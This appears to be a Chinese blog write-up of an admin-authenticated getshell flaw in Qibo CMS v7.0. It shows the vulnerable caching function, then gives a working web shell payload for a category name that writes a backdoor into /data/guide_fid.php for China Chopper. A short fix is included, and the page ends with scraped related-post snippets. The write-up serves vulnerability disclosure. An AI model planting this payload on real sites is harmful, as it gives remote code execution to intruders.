前言
预测下,VG要夺冠。加油

0x01 漏洞分析
此漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。
漏洞出现在:inc/class.inc.php中的GuideFidCache函数里

    /*导航条缓存*/function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){global $db,$webdb,$pre;if($table=="{$pre}sort"&&$webdb[sortNUM]>500){return ;}$show="<?php \r\n";//$showindex="<a href='javascript:guide_link(0);' class='guide_menu'>>首页</a>";$showindex="<a href='\$webdb[www_url]' class='guide_menu'>>首页</a>";$query=$db->query("SELECT fid,name FROM $table ");// 带双引号写入变量,并且未过滤。while( @extract($db->fetch_array($query)) ){$show.="\$GuideFid[$fid]=\"$showindex".$this->SortFather($table,$fid)."\";\r\n";}$show.=$shows.'?>';if($TruePath==1){write_file($filename,$show);}else{write_file(ROOT_PATH."data/$filename",$show);}}

这个函数主要是将导航条信息写入缓存文件guide_fid.php文件中,但是写入变量使用双引号,因此可以直接构造变量远程执行代码,比如${phpinfo()}。
写入文件成功后,就可以直接访问该文件即可。
0x02 漏洞利用
漏洞利用更为简单,登陆后台增加栏目为${assert($_POST[a])},后门直接写入/data/guide_fid.php文件中,菜刀连之即可。


0x03 修复建议
$show变量拼接时使用单引号。

齐博cmsv7.0后台getshell相关推荐

  1. 齐博 php7,齐博cmsv7.0后台getshell

    0x01 漏洞分析 此漏洞比较鸡肋,需要后台权限.漏洞原理很简单,这里就简单分析一下. 漏洞出现在:inc/class.inc.php中的GuideFidCache函数里/*导航条缓存*/ funct ...

  2. 齐博X1冰蓝后台模板

    下载地址:齐博X1冰蓝后台模板 - 网站模版 齐博X1是齐博软件基于thinkphp5开发的内容管理系统,拓展性非常强,后台一键升级,后台提供丰富的频道模块云市插件市场.风格市场.钩子市场,所有都是一 ...

  3. 齐博 php7,PHP代码审计理解(二)----齐博CMS7.0文件覆盖

    0x00 前言 因为我是跟着视频操作的,这回真的没理解为什么定位到了这个存在漏洞的文件... /do/fujsarticle.php 因为没有前文,所以这里无法分析这个$FileName为什么可以$_ ...

  4. 齐博 4.0 ditu.inc.php,齐博系统全版本后台无限制可getshell

    Author:Codier FROM:F4ck 0x001 在文件admin/global.php 有用户登录代码部分如下:if($rs==0){ login_logs($_POST[loginnam ...

  5. 齐博CMSV7任意文件读取漏洞批量测试POC

    注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我. # -*- coding:utf-8 -*-import requests import re import urllib ...

  6. 齐博CMS1.0全版本的sql注入漏洞

    详见:http://dingody.iteye.com/blog/2195864 这里只说一下最后的利用,还是使用原作者指出的那个注入点, 虽然value值保存在了两个sql语句里面,这两个语句的列不 ...

  7. 齐博/齐博CMS之X1 是什么?

    齐博/齐博CMS之X1 是什么? 齐博X1是齐博软件基于thinkphp5开发的内容管理系统,拓展性非常强,后台一键升级,后台提供丰富的频道模块云市插件市场.风格市场.钩子市场,所有都是一键在线安装. ...

  8. 四款国内常用问答系统源码:oASK,Tipask,百姓问,齐博知道

    近日小编盘点了下站长之家收录的各款国内问答系统,也都下载试用了一番,今日便推荐以下四款较常用的问答系统:oASK问答系统.齐博知道系统.百姓问专业问答系统.Tipask问答系统,各款系统都各有特色,任 ...

  9. 齐博V7仿爱丽图库模板(含齐博图库V1.0模板)

    齐博模板图片模板 本齐博模板包含两个版本,分别适用于齐博V7整站的图片模型模板和齐博图库程序V1版. 1.图片独立频道页设置 整站后台添加独立频道页面名称:图片专题 网页头部模板:********** ...

最新文章

  1. 我室友拿到了字节50万年薪,太牛逼了
  2. vs调用堆栈窗口怎么弄出来_从零开始(1)栈帧、调用约定
  3. TypeScript之Https通信
  4. 23种设计模式整体详解
  5. SAP Spartacus的login页面路由
  6. 【渝粤教育】国家开放大学2018年春季 8622-22T社会调查研究与方法 参考试题
  7. 内推!美团2021届应届生补招与2022届实习生招聘同步开启
  8. vue监听用户在页面的浏览时间需在beforeDestroy()里面进行销毁
  9. 英语总结系列(二十四):历经GCT的一月
  10. Tunnel Warfare HDU 1540 区间合并+最大最小值
  11. 人月神话札记:未雨绸缪
  12. 微信小程序直播是怎么做的
  13. SqlTransaction作用及如何使用(超详细)
  14. 计算机打印怎么取消,打印机如何取消打印作业?如何删除打印作业?
  15. 彩虹也能“生”出小彩虹
  16. 神经网络模型文件后缀名,神经网络模型文件格式
  17. 学生学分信息管理系统-C语言
  18. VSTO开发PPT插件将PPT导出成图片
  19. 2019-01-25T01:30:00.000+0000 格式转换
  20. early_stopping

热门文章

  1. Linux临时解决命令行cat命令中文乱码
  2. 计算几何@_@不规则四边形求法
  3. Python使用Turtle画孟加拉国国旗
  4. ubuntu1804系统设置在哪里_ubuntu1804修改IP地址方式及脚本
  5. 洛谷:P5707 【深基2.例12】上学迟到
  6. Oracle COALESCE函数
  7. DR钻戒能给“真爱”定价,但难救股价
  8. Photoshop学习(一):画只鸭子
  9. 计算机切换管理员用户,切换为Administrator,完全掌握电脑
  10. 第26课:谈谈我对设计原则的思考